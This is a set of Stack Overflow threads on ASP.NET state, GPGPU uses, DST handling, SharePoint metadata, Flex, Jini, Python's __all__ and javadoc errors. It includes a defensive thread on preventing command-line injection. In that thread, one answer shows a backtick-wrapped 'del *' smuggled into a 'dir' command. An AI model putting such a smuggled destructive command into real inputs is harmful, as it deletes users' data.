The problem with the above code is that the webpage used is the default site with the image set to 1.jpg, so the loaded image is always 2.jpg.
So in the process of loading the page, is it possible to pull the last image used from the pages properties?
A: You can store data in your page's ViewState dictionary
So in your Page_Load you could write something like...
var lastPicNum = (int)ViewState["lastPic"];
lastPicNum++;
MainPic.ImageUrl = string.Format("~/Images/{0}.jpg", lastPicNum);
ViewState["lastPic"] = lastPicNum;
you should get the idea.
And if you're programming ASP.NET and still does not understands how ViewState and web forms work, you should read this MSDN article
Understanding ViewState from the beginning will help with a lot of ASP.NET gotchas as well.
A: int num = 1;
if(Session["ImageNumber"] != null)
{
num = Convert.ToInt32(Session["ImageNumber"]) + 1;
}
Session["ImageNumber"] = num;
A: You'll have to hide the last value in a HiddenField or ViewState or somewhere like that...
A: If you need to change images to the next in the sequence if you hit the F5 or similar refresh button, then you need to store the last image id or something in a server-side storage, or in a cookie. Use a Session variable or similar.
A: It depends on how long you want it to persist (remember) the last viewed value. My preferred choice would be the SESSION.
A: @chakrit
does this really work if refreshing the page?
i thought the viewstate was stored on the page, and had to be sent to the server on a postback, with a refresh that is not happening.
A: @John ah Sorry I thought that your "refresh" meant postbacks.
In that case, just use a Session variable.
FYI, I suggested you use the ViewState dictionary instead of Session because the variable is used inside only that single page, so it shouldn't be using session-wide variable, that's bad practice.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44787",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
Q: How well do common programming tasks translate to GPUs? I have recently begun working on a project to establish how best to leverage the processing power available in modern graphics cards for general programming. It seems that the field general purpose GPU programming (GPGPU) has a large bias towards scientific applications with a lot of heavy math as this fits well with the GPU computational model. This is all good and well, but most people don't spend all their time running simulation software and the like so we figured it might be possible to create a common foundation for easily building GPU-enabled software for the masses.
This leads to the question I would like to pose; What are the most common types of work performed by programs? It is not a requirement that the work translates extremely well to GPU programming as we are willing to accept modest performance improvements (Better little than nothing, right?).
There are a couple of subjects we have in mind already:
*
*Data management - Manipulation of large amounts of data from databases
and otherwise.
*Spreadsheet type programs (Is somewhat related to the above).
*GUI programming (Though it might be impossible to get access to the
relevant code).
*Common algorithms like sorting and searching.
*Common collections (And integrating them with data manipulation
algorithms)
Which other coding tasks are very common? I suspect a lot of the code being written is of the category of inventory management and otherwise tracking of real 'objects'.
As I have no industry experience I figured there might be a number of basic types of code which is done more often than I realize but which just doesn't materialize as external products.
Both high level programming tasks as well as specific low level operations will be appreciated.
A: General programming translates terribly to GPUs. GPUs are dedicated to performing fairly simple tasks on streams of data at a massive rate, with massive parallelism. They do not deal well with the rich data and control structures of general programming, and there's no point trying to shoehorn that into them.
A:
General programming translates terribly to GPUs. GPUs are dedicated to performing fairly simple tasks on streams of data at a massive rate, with massive parallelism. They do not deal well with the rich data and control structures of general programming, and there's no point trying to shoehorn that into them.
This isn't too far away from my impression of the situation but at this point we are not concerning ourselves too much with that. We are starting out by getting a broad picture of which options we have to focus on. After that is done we will analyse them a bit deeper and find out which, if any, are plausible options. If we end up determining that it is impossible to do anything within the field, and we are only increasing everybody's electricity bill then that is a valid result as well.
A: Things that modern computers do a lot of, where a little benefit could go a long way? Let's see...
*
*Data management: relational database management could benefit from faster relational joins (especially joins involving a large number of relations). Involves massive homogeneous data sets.
*Tokenising, lexing, parsing text.
*Compilation, code generation.
*Optimisation (of queries, graphs, etc).
*Encryption, decryption, key generation.
*Page layout, typesetting.
*Full text indexing.
*Garbage collection.
A: I do a lot of simplifying of configuration. That is I wrap the generation/management of configuration values inside a UI. The primary benefit is I can control work flow and presentation to make it simpler for non-techie users to configure apps/sites/services.
A: You might want to take a look at the March/April issue of ACM's Queue magazine, which has several articles on GPUs and how best to use them (besides doing graphics, of course).
A: The other thing to consider when using a GPU is the bus speed, Most Graphics cards are designed to have a higher bandwidth when transferring data from the CPU out to the GPU as that's what they do most of the time. The bandwidth from the GPU back up to the CPU, which is needed to return results etc, isn't as fast. So they work best in a pipelined mode.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44789",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: How can I determine whether a given date is in Daylight Saving Time for a given timezone in .NET 2.0? I'm on .NET 2.0, running under Medium Trust (so TimeZoneInfo and the Registry are not allowed options). I'm asking the user for two dates and a time zone, and would really love to be able to automatically determine whether I need to adjust the time zone for DST.
This probably isn't even a valid scenario unless I have some very robust support, a la TimeZoneInfo, to differentiate between all of the different varieties of Time Zones in the first place.
A: In .NET 2.0 you have to code this yourself. It involves researching daylight savings time laws in various regions and building that into your own data structures. The problem is somewhat simplified if you only care about a subset of time zones, for example just in the USA, but if you need all global time zones, you have a lot of work to do, and then the code has to be updated every few years when the laws change. Even the new time zone objects in the latest version of .NET will require windows updates to keep them correct as laws change.
Look here, here, and here for more info.
A: The TZ Database is a public domain database of timezone rules that is very well maintained. There is also a compiled format for the data they provide, and there are lots of libraries available to read the compiled data, like this one: ZoneInfo (tz database / Olson database) .NET API
A: Excellent timezone library here: TZ4Net
A: Well, since TimeZoneInfo is excluded, you're probably not going to find a solution in the framework itself (but don't quote me on that).
In which case, have you considered reflectoring the TimeZoneInfo class and using what you find there?
A: @Domenic, I've considered, but I'd prefer to stay legal, and I'm fairly sure the information would have to be embedded into the framework anyway, or grabbed from the registry in some sneaky way that doesn't require permissions...
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44795",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Preventing Command Line Injection Attacks We're currently building an application that executes a number of external tools. We often have to pass information entered into our system by users to these tools.
Obviously, this is a big security nightmare waiting to happen.
Unfortunately, we've not yet found any classes in the .NET Framework that execute command line programs while providing the same kind of guards against injection attacks as the IDbCommand objects do for databases.
Right now, we're using a very primitive string substitution which I suspect is rather insufficient:
protected virtual string Escape(string value)
{
return value
.Replace(@"\", @"\\")
.Replace(@"$", @"\$")
.Replace(@"""", @"\""")
.Replace("`", "'")
;
}
What do you guys do to prevent command-line injection attacks? We're planning to implement a regex that is very strict and only allows a very small subset of characters through, but I was wondering if there was a better way.
Some clarifications:
*
*Some of these tools do not have APIs we can program against. If they did, we wouldn't be having this problem.
*The users don't pick tools to execute, they enter meta-data which the tools we've chosen use (for example, injecting meta data such as copyright notices into target files).
A: Are you executing the programs directly or going through the shell? If you always launch an external program by giving the full path name to the executable and leaving the shell out of the equation, then you aren't really susceptible to any kind of command line injection.
EDIT: DrFloyd, the shell is responsible for evaluating things like the backtick. No shell, no shell evaluation. Obviously, you've still got to be aware of any potential security gotchas in the programs that you're calling -- but I don't think this question is about that.
A: When you Process.Start a new process, supply the parameters in its Parameters argument instead of building the whole command line yourself.
Haven't got time for a proper test, but I think that should help guard it to some level.
Will test this out tomorrow.
EDIT: Ah, someone beat me to it again. But here's another point: Try using the Console.InputStream (can't remember exact name) to supply data instead of passing parameters, is that a possible solution? like fix the command so it reads from the CON device and you then supply the data via input stream instead.
A: In C++ on Windows, you just escape \ and " where needed, quote the argument and ShellExecute it. Then, everything inside the quotes should be treated as text.
This should illustrate:
#include <iostream>
#include <string>
#include <windows.h>
#include <cstdlib>
using namespace std;
// Escape and quote string for use as Windows command line argument
string qEscape(const string& s) {
string result("\"");
for (string::const_iterator i = s.begin(); i != s.end(); ++i) {
const char c = *i;
const string::const_iterator next = i + 1;
if (c == '"' || (c == '\\' && (next == s.end() || *next == '"'))) {
result += '\\';
}
result += c;
}
result += '"';
return result;
}
int main() {
// Argument value to pass: c:\program files\test\test.exe
const string safe_program = qEscape("c:\\program files\\test\\test.exe");
cout << safe_program << " ";
// Argument value to pass: You're the "best" around.
const string safe_arg0 = qEscape("You're the \"best\" around.");
// Argument value to pass: "Nothing's" gonna ever keep you down.
const string safe_arg1 = qEscape("\"Nothing's\" gonna ever keep you down.");
const string safe_args = safe_arg0 + " " + safe_arg1;
cout << safe_args << "\n\n";
// c:\program files\test\ to pass.
const string bs_at_end_example = qEscape("c:\\program files\\test\\");
cout << bs_at_end_example << "\n\n";
const int result = reinterpret_cast<int>(ShellExecute(NULL, "open", safe_program.c_str(), safe_args.c_str(), NULL, SW_SHOWNORMAL));
if (result < 33) {
cout << "ShellExecute failed with Error code " << result << "\n";
return EXIT_FAILURE;
}
}
But, with any method you use, you should test the hell out of it to see that it does really prevent injection.
A: Don't use a blacklist for preventing injections. If there are n ways to inject code, you'll think of n - m where m > 0.
Use a whitelist of accepted parameters (or patterns). It is much more restrictive by nature, but that's the nature of security.
A: Well, if you can invoke the tools programmatically without the command line, that would probably be your best option. Otherwise, you could potentially execute the command line tool via a user that has absolutely no access to do anything (except perhaps a single directory that they can't do any harm with)... though that may end up breaking the tool, depending on what the tool does.
Just note, I have never had to face this problem, because I have never actually had to invoke a command line tool from an externally facing application where the tool requires input from the user.
A: Hmmm...
It sounds like you have a list of valid commands that the users are able to execute. But you don't want them to execute them all.
You could try to take the actual command line and verify the file exists in the "safe" location at least.
You could also solve the problem with more interface, provide a drop down of commands and parameters they could use. It's more work on your end, but it ultimately helps the users.
A:
Are you executing the programs directly or going through the shell? If you always launch an external program by giving the full path name to the executable and leaving the shell out of the equation, then you aren't really susceptible to any kind of command line injection.
@Curt Hagenlocher The backtick can kill you. If the Windows System is setup "wrong", or the unix system allows it, a dir &bt;del *&bt; will first execute the del * command then use the output in place of the del *, which in this case, won't matter because there is nothing to dir (or ls)
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44799",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "10"
} |
Q: Read/write Person metadata from a Word doc stored in SharePoint using VBA or VSTO? Scenario: Document library in SharePoint with column x of "Person or Group" type. From within a VBA macro (or VSTO add-in) we're trying to access the MetaProperty on the document to set/get the user name. Any attempt to access the value via the ContentTypeProperties collection throws a
Type MisMatch error (13).
The Type property of the MetaProperty object says it's msoMetaPropertyTypeUser. I cannot find any examples of how to work with MetaProperties of this type. Anyone have any experience with this?
Thanks!
A: You should be able to just do something like this:
using (SPSite site = new SPSite("http://yoursite/subsite"))
{
using (SPWeb web = site.OpenWeb())
{
SPList list = web.Lists["DocLibraryName"];
SPListItemCollection items = list.GetItems(list.Views["All Documents"]);
foreach (SPListItem item in items)
{
item["Modified By"] = "Updated Value";
}
}
}
Any metadata for a document should be available by indexing the column name of the SPListItem.
A: I did it.
The trick here is actually to know that if you put a string corresponding to the user index in MOSS users in the custom property of the Word document, MOSS will recognize it and find the corresponding user to map the field.
so you just need to call http:///_vti_bin/usergroup.asmx
use the function GetUserInfo and retrieve the user index (ID) from it.
MOSSusergroup.UserGroup userGroupService = new MOSSusergroup.UserGroup();
userGroupService.Credentials = System.Net.CredentialCache.DefaultCredentials;
System.Xml.XmlNode node = userGroupService.GetUserInfo(userLogin);
string index = node.FirstChild.Attributes["ID"].Value;
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44803",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: Flex and ADO.NET Data Services...anyone done it? Has anyone used ADO.NET Data Services as a data source for Adobe Flex applications? If so, any success stories or tragedies to avoid? If you did use it, how did you handle security?
A: I use WebORB for .NET to do Flex remoting and then use DLINQ on the server. One tricky thing about using LINQ with WebORB is that WebORB uses Reflection to automatically retrieve all the relationships of the object(s) you return to Flex. This causes severe time penalties as LINQ uses lazy loading to load relationships. To prevent this from happening, I do something like the following:
Override your DataContext's constructor and add the following code:
this.DeferredLoadingEnabled = false;
DataLoadOptions dlo = new DataLoadOptions();
dlo.LoadWith<Order>(q => q.Payments);
dlo.LoadWith<Order>(q => q.Customer);
this.LoadOptions = dlo;
This tells the DataContext to disable deferred loading of relationships and specifically instructs it to load just the relationships you want, without lazy loading. That way, WebORB isn't causing any lazy loading to happen through Reflection and the number of relationships being transferred to Flex is kept at a minimum.
Hope this helps you in some way. It's definitely one of those little "gotchas" when working with Flex/WebORB and LINQ.
A: Yes, we use Flex with .Net web services extensively.
Flex can't handle .Net DataSets, or indeed much by way of complex xml types. We found that it was best to keep to relatively simple xml output.
However, if you do that, it can handle .Net web service output fine:
<mx:WebService id="myDataService" showBusyCursor="true">
<mx:operation name="WebMethodName"
resultFormat="object"
result="functionFiredOnComplete();">
</mx:operation>
</mx:WebService>
public function load():void
{
myDataService.loadWSDL( "web method's wsdl" );
myDataService.WebMethodName.send( params );
}
public function functionFiredOnComplete():void
{
// get data
var myData:Object = myDataService.WebMethodName.lastResult;
...
A: He Asked about ADO.NET Data Services not web service
A: Flex can only do GET and POST
Flex doesn't understand HTTP Response messages
So in order to have Flex talk to ADO.NET data services you either have to;
1. use a proxy server, but you have to find or build one yourself
2. modify the incoming requests and use $method=MERGE and so on (same as proxy)
3. use another as3 httpService client, there are some opensource initiatives
Then you have to find out how to post data, and it cost a lot of time when you want to create a new record with JSON and specify a Id wich has a link to another table. This because you can't just update the integer, but instead you have to create a link string, it's feels not really easy.
So ofcourse it can be done, but out of the box you really have to make it yourself. I know that Flash Builder 4 will come with a REST import, this could speed up things, but hve no experience for that
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44817",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: Default smart device project can't find dependencies When running the default c++ project in Visual Studios for a Windows CE 5.0 device, I get an error complaining about missing resources. Depends says that my executable needs ayghsell.dll (the Windows Mobile shell), and CoreDll.dll. Does this mean that my executable can only be run on Windows Mobile devices, instead of any generic Windows CE installation? If that's the case, how do I create an executable targeting generic WinCE?
A: Depends what you mean by a generic Windows CE installation. Windows CE itself is a modularised operating system, so different devices can have different modules included. Therefore each Windows CE device can have a radically different OS installed (headless even).
Coredll is the standard "common" library that gets included in a Windows CE installation, however it can contain different components depending on the other modules in the system.
If you want to target a relatively standard version of Windows CE either target the Standard SDK set of components, or go for a Windows Mobile platform.
If you have an SDK then install and use that. If none is available then you can generate an SDK using Platform Builder and the OS project files.
To get your application to work on a non-Windows Mobile installation of Windows CE you just have to remove the code that uses the aygshell library, and not link to those libraries.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44821",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: Is JINI at all active anymore? Everyone I talk to who knows (knew) about it claims it was the greatest thing since sliced bread. Why did it fail? Or, if it didn't fail, who's using it now?
A: Check out GigaSpaces. It's a quite successful Jini/Javaspaces implementation.
I think Jini has a great model, but it is stuck with Java. Web-services is more appealing because it works with standarized protocols, even though Jini service discovery is more natural.
A: Things have definitely quited down for the idea. Which is strange since you'd think its goals are even more relevant now.
http://www.jini.org/wiki/Category:News
A: old question, but JINI was given to Apache and became Apache River project. However, that project is now retired.
A: Zeroconf and other discovery protocols are similarly referred to as the greatest thing since sliced bread; it's just that the flavor keeps changing.
A: The jewel in the crown of Jini was it's JavaSpaces service IMO. Sad that Sun seem to have abandoned it. It still exists as Apache River, but is now retired.
A: My two cents... Jini was/is nice, but I think it tried to be a Java-centric CORBA back in the day when corporations were beginning to be reluctant regarding paying the big bucks for what CORBA brought to the table. WS-* specs began to acquire the "accepted-solution" mind-share in the industry. I think there was a small window where Jini could have grabbed substantial market share, but it never happened. Sun wanted too much money for what Jini brought to the table compared to other alternatives. I would love to hear from folks that disagree! My opinion is that Jini is sound tech, but business-wise has no future in the enterprise. It may find a niche elsewhere, depending on what Oracle decides to do with it.
A: Jini was an amazing technology. The only reason pushed EJB systems was that it allowed Sun to sell more hardware as EJB ran best on highpowered machines (due to shared state and database access). At the time (1999) Jini allowed much better scalability which ran well on commodity hardware, so it made sense for Sun to not promote Jini. Its a shame as I kept wondering when someone would release an Open Source easy to use Jini server like JBoss did with J2EE. I did however save companies alot of time and money by using the Jini techniques (based on Linda TupleSpaces) and applying them to writing software systems by using Tuple Spaces implemented in other ways.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44824",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: What does __all__ mean in Python? I see __all__ in __init__.py files. What does it do?
A: It also changes what pydoc will show:
module1.py
a = "A"
b = "B"
c = "C"
module2.py
__all__ = ['a', 'b']
a = "A"
b = "B"
c = "C"
$ pydoc module1
Help on module module1:
NAME
module1
FILE
module1.py
DATA
a = 'A'
b = 'B'
c = 'C'
$ pydoc module2
Help on module module2:
NAME
module2
FILE
module2.py
DATA
__all__ = ['a', 'b']
a = 'A'
b = 'B'
I declare __all__ in all my modules, as well as underscore internal details, these really help when using things you've never used before in live interpreter sessions.
A: __all__ customizes * in from <module> import *
and from <package> import *.
A module is a .py file meant to be imported.
A package is a directory with a __init__.py file. A package usually contains modules.
MODULES
""" cheese.py - an example module """
__all__ = ['swiss', 'cheddar']
swiss = 4.99
cheddar = 3.99
gouda = 10.99
__all__ lets humans know the "public" features of a module.[@AaronHall] Also, pydoc recognizes them.[@Longpoke]
from module import *
See how swiss and cheddar are brought into the local namespace, but not gouda:
>>> from cheese import *
>>> swiss, cheddar
(4.99, 3.99)
>>> gouda
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name 'gouda' is not defined
Without __all__, any symbol (that doesn't start with an underscore) would have been available.
Imports without * are not affected by __all__
import module
>>> import cheese
>>> cheese.swiss, cheese.cheddar, cheese.gouda
(4.99, 3.99, 10.99)
from module import names
>>> from cheese import swiss, cheddar, gouda
>>> swiss, cheddar, gouda
(4.99, 3.99, 10.99)
import module as localname
>>> import cheese as ch
>>> ch.swiss, ch.cheddar, ch.gouda
(4.99, 3.99, 10.99)
PACKAGES
In the __init__.py file of a package __all__ is a list of strings with the names of public modules or other objects. Those features are available to wildcard imports. As with modules, __all__ customizes the * when wildcard-importing from the package.[@MartinStettner]
Here's an excerpt from the Python MySQL Connector __init__.py:
__all__ = [
'MySQLConnection', 'Connect', 'custom_error_exception',
# Some useful constants
'FieldType', 'FieldFlag', 'ClientFlag', 'CharacterSet', 'RefreshOption',
'HAVE_CEXT',
# Error handling
'Error', 'Warning',
...etc...
]
The default case, asterisk with no __all__ for a package, is complicated, because the obvious behavior would be expensive: to use the file system to search for all modules in the package. Instead, in my reading of the docs, only the objects defined in __init__.py are imported:
If __all__ is not defined, the statement from sound.effects import * does not import all submodules from the package sound.effects into the current namespace; it only ensures that the package sound.effects has been imported (possibly running any initialization code in __init__.py) and then imports whatever names are defined in the package. This includes any names defined (and submodules explicitly loaded) by __init__.py. It also includes any submodules of the package that were explicitly loaded by previous import statements.
And lastly, a venerated tradition for stack overflow answers, professors, and mansplainers everywhere, is the bon mot of reproach for asking a question in the first place:
Wildcard imports ... should be avoided, as they [confuse] readers and many automated tools.
[PEP 8, @ToolmakerSteve]
A: It's a list of public objects of that module, as interpreted by import *. It overrides the default of hiding everything that begins with an underscore.
A:
Explain all in Python?
I keep seeing the variable __all__ set in different __init__.py files.
What does this do?
What does __all__ do?
It declares the semantically "public" names from a module. If there is a name in __all__, users are expected to use it, and they can have the expectation that it will not change.
It also will have programmatic effects:
import *
__all__ in a module, e.g. module.py:
__all__ = ['foo', 'Bar']
means that when you import * from the module, only those names in the __all__ are imported:
from module import * # imports foo and Bar
Documentation tools
Documentation and code autocompletion tools may (in fact, should) also inspect the __all__ to determine what names to show as available from a module.
__init__.py makes a directory a Python package
From the docs:
The __init__.py files are required to make Python treat the directories as containing packages; this is done to prevent directories with a common name, such as string, from unintentionally hiding valid modules that occur later on the module search path.
In the simplest case, __init__.py can just be an empty file, but it can also execute initialization code for the package or set the __all__ variable.
So the __init__.py can declare the __all__ for a package.
Managing an API:
A package is typically made up of modules that may import one another, but that are necessarily tied together with an __init__.py file. That file is what makes the directory an actual Python package. For example, say you have the following files in a package:
package
├── __init__.py
├── module_1.py
└── module_2.py
Let's create these files with Python so you can follow along - you could paste the following into a Python 3 shell:
from pathlib import Path
package = Path('package')
package.mkdir()
(package / '__init__.py').write_text("""
from .module_1 import *
from .module_2 import *
""")
package_module_1 = package / 'module_1.py'
package_module_1.write_text("""
__all__ = ['foo']
imp_detail1 = imp_detail2 = imp_detail3 = None
def foo(): pass
""")
package_module_2 = package / 'module_2.py'
package_module_2.write_text("""
__all__ = ['Bar']
imp_detail1 = imp_detail2 = imp_detail3 = None
class Bar: pass
""")
And now you have presented a complete api that someone else can use when they import your package, like so:
import package
package.foo()
package.Bar()
And the package won't have all the other implementation details you used when creating your modules cluttering up the package namespace.
__all__ in __init__.py
After more work, maybe you've decided that the modules are too big (like many thousands of lines?) and need to be split up. So you do the following:
package
├── __init__.py
├── module_1
│ ├── foo_implementation.py
│ └── __init__.py
└── module_2
├── Bar_implementation.py
└── __init__.py
First make the subpackage directories with the same names as the modules:
subpackage_1 = package / 'module_1'
subpackage_1.mkdir()
subpackage_2 = package / 'module_2'
subpackage_2.mkdir()
Move the implementations:
package_module_1.rename(subpackage_1 / 'foo_implementation.py')
package_module_2.rename(subpackage_2 / 'Bar_implementation.py')
create __init__.pys for the subpackages that declare the __all__ for each:
(subpackage_1 / '__init__.py').write_text("""
from .foo_implementation import *
__all__ = ['foo']
""")
(subpackage_2 / '__init__.py').write_text("""
from .Bar_implementation import *
__all__ = ['Bar']
""")
And now you still have the api provisioned at the package level:
>>> import package
>>> package.foo()
>>> package.Bar()
<package.module_2.Bar_implementation.Bar object at 0x7f0c2349d210>
And you can easily add things to your API that you can manage at the subpackage level instead of the subpackage's module level. If you want to add a new name to the API, you simply update the __init__.py, e.g. in module_2:
from .Bar_implementation import *
from .Baz_implementation import *
__all__ = ['Bar', 'Baz']
And if you're not ready to publish Baz in the top level API, in your top level __init__.py you could have:
from .module_1 import * # also constrained by __all__'s
from .module_2 import * # in the __init__.py's
__all__ = ['foo', 'Bar'] # further constraining the names advertised
and if your users are aware of the availability of Baz, they can use it:
import package
package.Baz()
but if they don't know about it, other tools (like pydoc) won't inform them.
You can later change that when Baz is ready for prime time:
from .module_1 import *
from .module_2 import *
__all__ = ['foo', 'Bar', 'Baz']
Prefixing _ versus __all__:
By default, Python will export all names that do not start with an _ when imported with import *. As demonstrated by the shell session here, import * does not bring in the _us_non_public name from the us.py module:
$ cat us.py
USALLCAPS = "all caps"
us_snake_case = "snake_case"
_us_non_public = "shouldn't import"
$ python
Python 3.10.0 (default, Oct 4 2021, 17:55:55) [GCC 10.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from us import *
>>> dir()
['USALLCAPS', '__annotations__', '__builtins__', '__doc__', '__loader__', '__name__', '__package__', '__spec__', 'us_snake_case']
You certainly could rely on this mechanism. Some packages in the Python standard library, in fact, do rely on this, but to do so, they alias their imports, for example, in ctypes/__init__.py:
import os as _os, sys as _sys
Using the _ convention can be more elegant because it removes the redundancy of naming the names again. But it adds the redundancy for imports (if you have a lot of them) and it is easy to forget to do this consistently - and the last thing you want is to have to indefinitely support something you intended to only be an implementation detail, just because you forgot to prefix an _ when naming a function.
I personally write an __all__ early in my development lifecycle for modules so that others who might use my code know what they should use and not use.
Most packages in the standard library also use __all__.
When avoiding __all__ makes sense
It makes sense to stick to the _ prefix convention in lieu of __all__ when:
*
*You're still in early development mode and have no users, and are constantly tweaking your API.
*Maybe you do have users, but you have unittests that cover the API, and you're still actively adding to the API and tweaking in development.
An export decorator
The downside of using __all__ is that you have to write the names of functions and classes being exported twice - and the information is kept separate from the definitions. We could use a decorator to solve this problem.
I got the idea for such an export decorator from David Beazley's talk on packaging. This implementation seems to work well in CPython's traditional importer. If you have a special import hook or system, I do not guarantee it, but if you adopt it, it is fairly trivial to back out - you'll just need to manually add the names back into the __all__
So in, for example, a utility library, you would define the decorator:
import sys
def export(fn):
mod = sys.modules[fn.__module__]
if hasattr(mod, '__all__'):
mod.__all__.append(fn.__name__)
else:
mod.__all__ = [fn.__name__]
return fn
and then, where you would define an __all__, you do this:
$ cat > main.py
from lib import export
__all__ = [] # optional - we create a list if __all__ is not there.
@export
def foo(): pass
@export
def bar():
'bar'
def main():
print('main')
if __name__ == '__main__':
main()
And this works fine whether run as main or imported by another function.
$ cat > run.py
import main
main.main()
$ python run.py
main
And API provisioning with import * will work too:
$ cat > run.py
from main import *
foo()
bar()
main() # expected to error here, not exported
$ python run.py
Traceback (most recent call last):
File "run.py", line 4, in <module>
main() # expected to error here, not exported
NameError: name 'main' is not defined
A: This is defined in PEP8 here:
Global Variable Names
(Let's hope that these variables are meant for use inside one module only.) The conventions are about the same as those for functions.
Modules that are designed for use via from M import * should use the __all__ mechanism to prevent exporting globals, or use the older convention of prefixing such globals with an underscore (which you might want to do to indicate these globals are "module non-public").
PEP8 provides coding conventions for the Python code comprising the standard library in the main Python distribution. The more you follow this, closer you are to the original intent.
A: I'm just adding this to be precise:
All other answers refer to modules. The original question explicitely mentioned __all__ in __init__.py files, so this is about python packages.
Generally, __all__ only comes into play when the from xxx import * variant of the import statement is used. This applies to packages as well as to modules.
The behaviour for modules is explained in the other answers. The exact behaviour for packages is described here in detail.
In short, __all__ on package level does approximately the same thing as for modules, except it deals with modules within the package (in contrast to specifying names within the module). So __all__ specifies all modules that shall be loaded and imported into the current namespace when us use from package import *.
The big difference is, that when you omit the declaration of __all__ in a package's __init__.py, the statement from package import * will not import anything at all (with exceptions explained in the documentation, see link above).
On the other hand, if you omit __all__ in a module, the "starred import" will import all names (not starting with an underscore) defined in the module.
A: Short answer
__all__ affects from <module> import * statements.
Long answer
Consider this example:
foo
├── bar.py
└── __init__.py
In foo/__init__.py:
*
*(Implicit) If we don't define __all__, then from foo import * will only import names defined in foo/__init__.py.
*(Explicit) If we define __all__ = [], then from foo import * will import nothing.
*(Explicit) If we define __all__ = [ <name1>, ... ], then from foo import * will only import those names.
Note that in the implicit case, python won't import names starting with _. However, you can force importing such names using __all__.
You can view the Python document here.
A: Linked to, but not explicitly mentioned here, is exactly when __all__ is used. It is a list of strings defining what symbols in a module will be exported when from <module> import * is used on the module.
For example, the following code in a foo.py explicitly exports the symbols bar and baz:
__all__ = ['bar', 'baz']
waz = 5
bar = 10
def baz(): return 'baz'
These symbols can then be imported like so:
from foo import *
print(bar)
print(baz)
# The following will trigger an exception, as "waz" is not exported by the module
print(waz)
If the __all__ above is commented out, this code will then execute to completion, as the default behaviour of import * is to import all symbols that do not begin with an underscore, from the given namespace.
Reference: https://docs.python.org/tutorial/modules.html#importing-from-a-package
NOTE: __all__ affects the from <module> import * behavior only. Members that are not mentioned in __all__ are still accessible from outside the module and can be imported with from <module> import <member>.
A: __all__ is used to document the public API of a Python module. Although it is optional, __all__ should be used.
Here is the relevant excerpt from the Python language reference:
The public names defined by a module are determined by checking the module’s namespace for a variable named __all__; if defined, it must be a sequence of strings which are names defined or imported by that module. The names given in __all__ are all considered public and are required to exist. If __all__ is not defined, the set of public names includes all names found in the module’s namespace which do not begin with an underscore character ('_'). __all__ should contain the entire public API. It is intended to avoid accidentally exporting items that are not part of the API (such as library modules which were imported and used within the module).
PEP 8 uses similar wording, although it also makes it clear that imported names are not part of the public API when __all__ is absent:
To better support introspection, modules should explicitly declare the names in their public API using the __all__ attribute. Setting __all__ to an empty list indicates that the module has no public API.
[...]
Imported names should always be considered an implementation detail. Other modules must not rely on indirect access to such imported names unless they are an explicitly documented part of the containing module's API, such as os.path or a package's __init__ module that exposes functionality from submodules.
Furthermore, as pointed out in other answers, __all__ is used to enable wildcard importing for packages:
The import statement uses the following convention: if a package’s __init__.py code defines a list named __all__, it is taken to be the list of module names that should be imported when from package import * is encountered.
A: __all__ affects how from foo import * works.
Code that is inside a module body (but not in the body of a function or class) may use an asterisk (*) in a from statement:
from foo import *
The * requests that all attributes of module foo (except those beginning with underscores) be bound as global variables in the importing module. When foo has an attribute __all__, the attribute's value is the list of the names that are bound by this type of from statement.
If foo is a package and its __init__.py defines a list named __all__, it is taken to be the list of submodule names that should be imported when from foo import * is encountered. If __all__ is not defined, the statement from foo import * imports whatever names are defined in the package. This includes any names defined (and submodules explicitly loaded) by __init__.py.
Note that __all__ doesn't have to be a list. As per the documentation on the import statement, if defined, __all__ must be a sequence of strings which are names defined or imported by the module. So you may as well use a tuple to save some memory and CPU cycles. Just don't forget a comma in case the module defines a single public name:
__all__ = ('some_name',)
See also Why is “import *” bad?
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44834",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1571"
} |
Q: Substitution Control at the User Control Level? I am trying to create some cached user controls. Basically Header and Footer are static.
Except the footer has one link that reads in the URL of the page and puts it into the javascript for sending a link to a friend. So I need that link to be dynamic.
I set up a substitution control and had the static method return the dynamic link.
Go to run and find that substitution controls are not supported at the user control level.
Is there any work around to this? Is there another control like substitution that works on the User Controls that I am not aware of?
A: I would forget about server side caching in this instance and rely on the simplicity of client side caching.
Your Javascript code could be client side cached just as easily as HTML, either by linking to an external javascript file and adding the necessary headers/expiries, or by embedding the script within the page itself and ensuring the page itself is cached.
Another possible method is by making an Ajax call on the page load to fetch the generated footer complete with correct link. This may take time on the first page load, but subsequent ajax requests would be cached on the client, thus seeing no penalty to future requests.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44851",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: Why am I getting a ClassCastException when generating javadocs? I'm using ant to generate javadocs, but get this exception over and over - why?
I'm using JDK version 1.6.0_06.
[javadoc] java.lang.ClassCastException: com.sun.tools.javadoc.ClassDocImpl cannot be cast to com.sun.javadoc.AnnotationTypeDoc
[javadoc] at com.sun.tools.javadoc.AnnotationDescImpl.annotationType(AnnotationDescImpl.java:46)
[javadoc] at com.sun.tools.doclets.formats.html.HtmlDocletWriter.getAnnotations(HtmlDocletWriter.java:1739)
[javadoc] at com.sun.tools.doclets.formats.html.HtmlDocletWriter.writeAnnotationInfo(HtmlDocletWriter.java:1713)
